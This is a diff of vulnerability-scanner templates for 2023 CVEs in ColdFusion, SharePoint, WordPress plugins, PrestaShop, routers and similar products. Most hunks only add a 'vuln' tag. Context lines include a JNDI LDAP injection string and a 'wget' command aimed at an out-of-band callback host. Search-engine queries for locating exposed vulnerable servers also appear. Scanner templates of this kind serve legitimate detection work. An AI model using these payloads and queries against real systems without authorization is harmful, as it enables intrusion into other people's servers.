diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 6e5ee6586ee..c7ca2a59f21 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -38,7 +38,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev,vkev + tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev,vkev,vuln variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/rcrzfd" diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 46e2cfb824a..be19f1c01c4 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="Microsoft-SharePoint" - app="microsoft-sharepoint" - tags: cve,cve2023,microsoft,sharepoint_server,kev,vkev + tags: cve,cve2023,microsoft,sharepoint_server,kev,vkev,vuln variables: client_id: "00000003-0000-0ff1-ce00-000000000000" diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index bb22733da87..cab92cac010 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/foogallery/ fofa-query: body=/wp-content/plugins/foogallery/ publicwww-query: "/wp-content/plugins/foogallery/" - tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated,fooplugins + tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated,fooplugins,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index 687c7d7dddb..1d68b96a01f 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -34,7 +34,7 @@ info: - app="openemr" - icon_hash=1971268439 google-query: intitle:"openemr" - tags: cve,cve2023,xss,openemr,open-emr + tags: cve,cve2023,xss,openemr,open-emr,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index f6c8b06b0b1..b36b84c14d7 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -40,7 +40,7 @@ info: google-query: - "intitle:\"cpanel - api codes\"" - intitle:"cpanel" - tags: cve,cve2023,cpanel,xss + tags: cve,cve2023,cpanel,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index 8ef8659b0bd..5e9955343f2 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -34,7 +34,7 @@ info: - app="openemr" - icon_hash=1971268439 google-query: intitle:"openemr" - tags: cve,cve2023,xss,openemr,open-emr + tags: cve,cve2023,xss,openemr,open-emr,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-29506.yaml b/http/cves/2023/CVE-2023-29506.yaml index 92f1b6e34a5..2013c4c7055 100644 --- a/http/cves/2023/CVE-2023-29506.yaml +++ b/http/cves/2023/CVE-2023-29506.yaml @@ -29,7 +29,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,xss + tags: cve,cve2023,xwiki,xss,vuln http: diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index f8a02c4a5b9..266ebf9951f 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: purchase_order_management_project product: purchase_order_management - tags: cve2023,cve,xss,purchase-order-management-system,purchase_order_management_project + tags: cve2023,cve,xss,purchase-order-management-system,purchase_order_management_project,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 057127c9986..c98ec617c23 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -29,7 +29,7 @@ info: vendor: miniorange product: wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\) framework: wordpress - tags: cve,cve2023,wp,wordpress,wp-plugin,auth-bypass,miniorange,vkev + tags: cve,cve2023,wp,wordpress,wp-plugin,auth-bypass,miniorange,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index f1ac80ac395..a44ddfea02a 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -27,7 +27,7 @@ info: vendor: ejs product: ejs framework: node.js - tags: cve,cve2023,ssti,rce,ejs,oast,node.js + tags: cve,cve2023,ssti,rce,ejs,oast,node.js,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 618ab8bf365..1f40024c68d 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: nuovo product: spreadsheet-reader - tags: cve2023,cve,nuovo,spreadsheet-reader,lfi + tags: cve2023,cve,nuovo,spreadsheet-reader,lfi,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index d8fe1b99293..bb7a86bcab9 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.html:"SolarView Compact" - cpe:"cpe:2.3:h:contec:solarview_compact" - tags: cve,cve2023,lfi,solarview,edb,contec,vkev + tags: cve,cve2023,lfi,solarview,edb,contec,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index b7eed8a8de2..a382ccc134b 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -36,7 +36,7 @@ info: - app="PowerJob" - app="powerjob" - body="powerjob" - tags: cve,cve2023,auth-bypass,powerjob + tags: cve,cve2023,auth-bypass,powerjob,vuln variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 3b737551a17..e3063996da4 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -34,7 +34,7 @@ info: - app="PowerJob" - app="powerjob" - body="powerjob" - tags: cve2023,cve,powerjob,unauth + tags: cve2023,cve,powerjob,unauth,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index af747d087ac..af62a5125ee 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -23,7 +23,7 @@ info: max-request: 2 vendor: totolink product: x5000r_firmware - tags: cve2023,cve,packetstorm,totolink,unauth,rce,intrusive + tags: cve2023,cve,packetstorm,totolink,unauth,rce,intrusive,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 90febf7aff3..5f8e21993ed 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -30,7 +30,7 @@ info: shodan-query: - "Server: imgproxy" - "server: imgproxy" - tags: cve,cve2023,imgproxy,ssrf,oast,evilmartians + tags: cve,cve2023,imgproxy,ssrf,oast,evilmartians,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 7deefd0f48b..229076c160e 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -32,7 +32,7 @@ info: shodan-query: - http.component:"Prestashop" - http.component:"prestashop" - tags: time-based-sqli,cve2023,cve,prestashop,sqli,leotheme,vkev + tags: time-based-sqli,cve2023,cve,prestashop,sqli,leotheme,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-30192.yaml b/http/cves/2023/CVE-2023-30192.yaml index 4b827e4e3c3..bfa44006efb 100644 --- a/http/cves/2023/CVE-2023-30192.yaml +++ b/http/cves/2023/CVE-2023-30192.yaml @@ -24,7 +24,7 @@ info: product: possearchproducts framework: prestashop shodan-query: http.component:"prestashop" - tags: cve,cve2023,prestashop,sqli,time-based-sqli + tags: cve,cve2023,prestashop,sqli,time-based-sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-30194.yaml b/http/cves/2023/CVE-2023-30194.yaml index 50f0488b5cc..f3b711bb5ce 100644 --- a/http/cves/2023/CVE-2023-30194.yaml +++ b/http/cves/2023/CVE-2023-30194.yaml @@ -24,7 +24,7 @@ info: vendor: prestashop product: poststaticfooter shodan-query: html:"posstaticfooter" - tags: cve,cve2023,prestashop,poststaticfooter,sqli,vkev + tags: cve,cve2023,prestashop,poststaticfooter,sqli,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index f09035ce357..502451e4a30 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ourphp product: ourphp - tags: cve2023,cve,xss,ourphp,unauthenticated + tags: cve2023,cve,xss,ourphp,unauthenticated,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 95637a1caef..58f386aa12c 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: ourphp product: ourphp - tags: cve2023,cve,xss,ourphp + tags: cve2023,cve,xss,ourphp,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index fc73ef12b65..b3664fc116e 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -30,7 +30,7 @@ info: vendor: webkul product: qloapps fofa-query: title="qloapps" - tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul + tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index c9b56dfbd31..63ddefc92bc 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -29,7 +29,7 @@ info: product: magnusbilling shodan-query: http.html:"magnusbilling" fofa-query: body="magnusbilling" - tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution,vkev + tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index 098c7bc9319..2893a997763 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -38,7 +38,7 @@ info: google-query: - intitle:"cacti" - intitle:"login to cacti" - tags: cve,cve2023,cacti,authenticated + tags: cve,cve2023,cacti,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index 31a5ddb2253..cfe8196ce30 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: rudderstack product: rudder-server - tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli,vkev + tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli,vkev,vuln variables: cmd: "wget {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index e6a27b8e6f2..158dd9041a2 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -29,7 +29,7 @@ info: publicwww-query: "/wp-content/plugins/mstore-api/" shodan-query: http.html:/wp-content/plugins/mstore-api/ fofa-query: body=/wp-content/plugins/mstore-api/ - tags: time-based-sqli,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui + tags: time-based-sqli,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index 0d664de710a..66a9e041393 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -29,7 +29,7 @@ info: vendor: advancedcustomfields product: advanced_custom_fields framework: wordpress - tags: cve2023,cve,wpscan,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss,advancedcustomfields,vkev + tags: cve2023,cve,wpscan,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss,advancedcustomfields,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index 1ba6875cc49..6347cb8b3e6 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -26,7 +26,7 @@ info: vendor: cms_tree_page_view_project product: cms_tree_page_view framework: wordpress - tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project + tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 9519da059e0..6881270c789 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -32,7 +32,7 @@ info: - http.title:"moodle" fofa-query: title="moodle" google-query: intitle:"moodle" - tags: cve,cve2023,moodle,xss,rce,authenticated + tags: cve,cve2023,moodle,xss,rce,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index f80c80bc5d6..e24108c349f 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -33,7 +33,7 @@ info: - title="Repetier-Server" - title="repetier-server" google-query: intitle:"repetier-server" - tags: cve2023,cve,repetier,lfi,repetier-server,vkev + tags: cve2023,cve,repetier,lfi,repetier-server,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3139.yaml b/http/cves/2023/CVE-2023-3139.yaml index 182da126e7f..9ca15c5509b 100644 --- a/http/cves/2023/CVE-2023-3139.yaml +++ b/http/cves/2023/CVE-2023-3139.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:"/wp-content/plugins/protect-wp-admin" fofa-query: body="/wp-content/plugins/protect-wp-admin/" publicwww-query: "/wp-content/plugins/protect-wp-admin/" - tags: cve,cve2023,wordpress,wp-plugin,protect-wp-admin,unauth,wpscan,vkev + tags: cve,cve2023,wordpress,wp-plugin,protect-wp-admin,unauth,wpscan,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index 339f6749901..ff7c6f442c4 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -28,7 +28,7 @@ info: - html:"Cassia Bluetooth Gateway Management Platform" - http.html:"cassia bluetooth gateway management platform" fofa-query: body="cassia bluetooth gateway management platform" - tags: cve,cve2023,rce,cassia,gateway,cassianetworks,vkev + tags: cve,cve2023,rce,cassia,gateway,cassianetworks,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index 1514a255588..ea015c2a388 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -23,7 +23,7 @@ info: product: timekeeper shodan-query: http.favicon.hash:2134367771 fofa-query: icon_hash=2134367771 - tags: cve,cve2023,timekeeper,rce,oast,fsmlabs,vkev + tags: cve,cve2023,timekeeper,rce,oast,fsmlabs,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-31478.yaml b/http/cves/2023/CVE-2023-31478.yaml index 635b3efddcf..c7ddf654669 100644 --- a/http/cves/2023/CVE-2023-31478.yaml +++ b/http/cves/2023/CVE-2023-31478.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: title:"GL.iNet Admin Panel" - tags: cve,cve2023,gl-inet,disclosure,vkev + tags: cve,cve2023,gl-inet,disclosure,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 04db023c75c..2f984c939a9 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: churchcrm product: churchcrm - tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated + tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-3169.yaml b/http/cves/2023/CVE-2023-3169.yaml index 8645d76eba3..e0aa0c30398 100644 --- a/http/cves/2023/CVE-2023-3169.yaml +++ b/http/cves/2023/CVE-2023-3169.yaml @@ -23,7 +23,7 @@ info: vendor: tagdiv product: tagdiv_composer fofa-query: body="/wp-content/plugins/td-composer" - tags: cve,cve2023,wordpress,wp-plugin,wp,xss,td-composer,tagdiv,intrusive,vkev + tags: cve,cve2023,wordpress,wp-plugin,wp,xss,td-composer,tagdiv,intrusive,vkev,vuln variables: string: "{{rand_text_numeric(13)}}" diff --git a/http/cves/2023/CVE-2023-3188.yaml b/http/cves/2023/CVE-2023-3188.yaml index 33682b17daf..c68545acde0 100644 --- a/http/cves/2023/CVE-2023-3188.yaml +++ b/http/cves/2023/CVE-2023-3188.yaml @@ -23,7 +23,7 @@ info: vendor: owncast_project product: owncast shodan-query: html:"owncast" - tags: cve,cve2023,owncast,oast,ssrf + tags: cve,cve2023,owncast,oast,ssrf,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-32068.yaml b/http/cves/2023/CVE-2023-32068.yaml index ac13545fdb4..262353498ad 100644 --- a/http/cves/2023/CVE-2023-32068.yaml +++ b/http/cves/2023/CVE-2023-32068.yaml @@ -27,7 +27,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,redirect + tags: cve,cve2023,xwiki,redirect,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index 96676e17d30..b09dc155e12 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -23,7 +23,7 @@ info: - html:"netmaker" - http.html:"netmaker" fofa-query: body="netmaker" - tags: cve,cve2023,info-key,netmaker,exposure,gravitl + tags: cve,cve2023,info-key,netmaker,exposure,gravitl,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-32117.yaml b/http/cves/2023/CVE-2023-32117.yaml index dca29423af2..c2ee2253d8c 100644 --- a/http/cves/2023/CVE-2023-32117.yaml +++ b/http/cves/2023/CVE-2023-32117.yaml @@ -25,7 +25,7 @@ info: publicwww-query: "/wp-content/plugins/integrate-google-drive/" product: integrate_google_drive vendor: softlabbd - tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive + tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index 3db1730407b..b6cfc3ff74a 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -39,7 +39,7 @@ info: - "/wp-content/plugins/eventon-lite/" - /wp-content/plugins/eventon/ google-query: inurl:"/wp-content/plugins/eventon/" - tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon + tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 57df804cd3d..fb113413fe7 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"Ghost" - http.component:"ghost" - tags: cve2023,cve,lfi,ghostcms,ghost,node.js,vkev + tags: cve2023,cve,lfi,ghostcms,ghost,node.js,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 2b6851d871a..4b9e421e1f4 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -31,7 +31,7 @@ info: product: essential_addons_for_elementor framework: wordpress google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite - tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper,vkev + tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 68893d60d27..6d1ce10d2f3 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"openfire" - intitle:"openfire admin console" - tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime,vkev + tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 8925317d8c1..086939b01a4 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: ivanti product: avalanche - tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive,vkev + tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 8cdfaf1d173..ab28671e144 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: phpgurukul product: old_age_home_management_system - tags: cve2023,cve,oahms,sqli,auth-bypass,phpgurukul + tags: cve2023,cve,oahms,sqli,auth-bypass,phpgurukul,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index 73490d5a7e3..5ffaf14dc9b 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -27,7 +27,7 @@ info: product: blogengine.net shodan-query: http.html:"blogengine.net" fofa-query: body="blogengine.net" - tags: cve2023,cve,Blogengine,cms,redirect,blogengine + tags: cve2023,cve,Blogengine,cms,redirect,blogengine,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index d8635d1bf44..ef9049744a8 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: faculty_evaluation_system_project product: faculty_evaluation_system - tags: cve,cve2023,sqli,faculty,authenticated,faculty_evaluation_system_project + tags: cve,cve2023,sqli,faculty,authenticated,faculty_evaluation_system_project,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 35b54f447de..af9cac1b998 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: faculty_evaluation_system_project product: faculty_evaluation_system - tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project + tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project,vuln variables: email: "{{randstr}}@{{rand_base(5)}}.com" string: "CVE-2023-33440" diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index a6745a95eca..2e3a89217d5 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -29,7 +29,7 @@ info: vendor: masteriyo product: masteriyo framework: wordpress - tags: cve2023,cve,wp-plugin,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo + tags: cve2023,cve,wp-plugin,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index 12a37189de5..c8c6e3330e3 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -31,7 +31,7 @@ info: framework: wordpress shodan-query: http.favicon.hash:1380908726 fofa-query: icon_hash=1380908726 - tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress,vkev + tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index f9344a84b40..b0fc8148828 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -31,7 +31,7 @@ info: product: dolibarr_erp\/crm shodan-query: http.favicon.hash:440258421 fofa-query: icon_hash=440258421 - tags: cve2023,cve,dolibarr,unauth + tags: cve2023,cve,dolibarr,unauth,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 898fe189550..49396e413a7 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -27,7 +27,7 @@ info: fofa-query: - app="H3C-Ent-Router" - app="h3c-ent-router" - tags: cve2023,cve,router,rce,h3c,vkev + tags: cve2023,cve,router,rce,h3c,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(7))}}" diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index 50836efcd66..8418dcba442 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -31,7 +31,7 @@ info: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" - tags: cve2023,cve,chamilo,unauth,cmd,rce,vkev + tags: cve2023,cve,chamilo,unauth,cmd,rce,vkev,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml index c7ab744b35f..6f9d9205fef 100644 --- a/http/cves/2023/CVE-2023-3380.yaml +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -22,7 +22,7 @@ info: vendor: wavlink product: wn579x3_firmware shodan-query: http.html:"Wavlink" - tags: cve,cve2023,wavlink,rce + tags: cve,cve2023,wavlink,rce,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 9af85020f0f..1916dc52400 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -27,7 +27,7 @@ info: fofa-query: - title="FUXA" - title="fuxa" - tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth,vkev + tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth,vkev,vuln variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-34020.yaml b/http/cves/2023/CVE-2023-34020.yaml index 120cbce4534..1f337b7461e 100644 --- a/http/cves/2023/CVE-2023-34020.yaml +++ b/http/cves/2023/CVE-2023-34020.yaml @@ -24,7 +24,7 @@ info: publicwww-query: "/wp-content/plugins/uncanny-learndash-toolkit/" product: uncanny_toolkit_for_learndash vendor: uncannyowl - tags: cve2023,cve,wordpress,uncanny-learndash-toolkit,wpscan,redirect + tags: cve2023,cve,wordpress,uncanny-learndash-toolkit,wpscan,redirect,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-34105.yaml b/http/cves/2023/CVE-2023-34105.yaml index 536cbef1bc5..628c372be27 100644 --- a/http/cves/2023/CVE-2023-34105.yaml +++ b/http/cves/2023/CVE-2023-34105.yaml @@ -23,7 +23,7 @@ info: shodan-query: http.favicon.hash:1386054408 verified: true max-request: 1 - tags: cve,cve2023,srs,rce,oast,vkev + tags: cve,cve2023,srs,rce,oast,vkev,vuln http: - raw: diff --git 